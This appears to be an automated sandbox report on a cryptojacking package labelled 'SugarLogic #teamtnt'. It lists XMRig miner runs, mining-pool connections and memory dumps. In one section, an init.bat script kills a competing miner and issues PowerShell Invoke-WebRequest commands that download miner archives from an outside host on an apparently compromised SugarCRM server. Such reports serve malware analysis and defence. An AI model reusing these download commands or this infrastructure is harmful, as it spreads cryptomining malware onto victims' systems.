memory/4336-117-0x000001BE63F80000-0x000001BE63FA0000-memory.dmp
memory/4336-118-0x000001BE63FB0000-0x000001BE63FD0000-memory.dmp
memory/4336-119-0x000001BE63FD0000-0x000001BE63FF0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
117s
Max time network
160s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
Files
memory/576-54-0x00000000000F0000-0x0000000000110000-memory.dmp
memory/576-55-0x0000000000390000-0x00000000003B0000-memory.dmp
memory/576-56-0x0000000000690000-0x00000000006B0000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsbe-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/198103836/payload.dat
[/tmp/198103836/payload.dat]
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
118s
Max time network
130s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsel-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/138283075/payload.dat
[/tmp/138283075/payload.dat]
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win10-en-20211014
Max time kernel
15s
Max time network
23s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.32:443 | N/A | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20211014
Max time kernel
7s
Max time network
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
122s
Max time network
158s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.30:443 | N/A | tcp |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 178.128.242.134:3333 | donate.v2.xmrig.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/3960-118-0x000001D7A4710000-0x000001D7A4730000-memory.dmp
memory/3960-119-0x000001D7A4740000-0x000001D7A4760000-memory.dmp
memory/3960-121-0x000001D7A4790000-0x000001D7A47B0000-memory.dmp
memory/3960-120-0x000001D7A4770000-0x000001D7A4790000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20210920
Max time kernel
5s
Max time network
5s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
118s
Max time network
149s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"
Network
Files
memory/832-54-0x00000000002E0000-0x0000000000300000-memory.dmp
memory/832-55-0x00000000003C0000-0x00000000003C4000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsbe-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/147773066/payload.dat
[/tmp/147773066/payload.dat]
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 79e4c0b77b8b96fda81ae95dfd4ec654 |
| SHA1 | 0c5c5d2367b1c05c1b3993cef2b1056461df04a1 |
| SHA256 | 2b6e568f5e6f02d719fdb9a2d2cb2ba56edaaedee44cf3fbe0be7cced67dbb59 |
| SHA512 | d7f1d7e3501208de6c2549cefd6348e2c4243f01240fba19d2df8ed553a2361d6ecea686679a4f510d81139bc63f52914d63b1fcbc7984d93de2f96539161330 |
Analysis: behavioral27
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025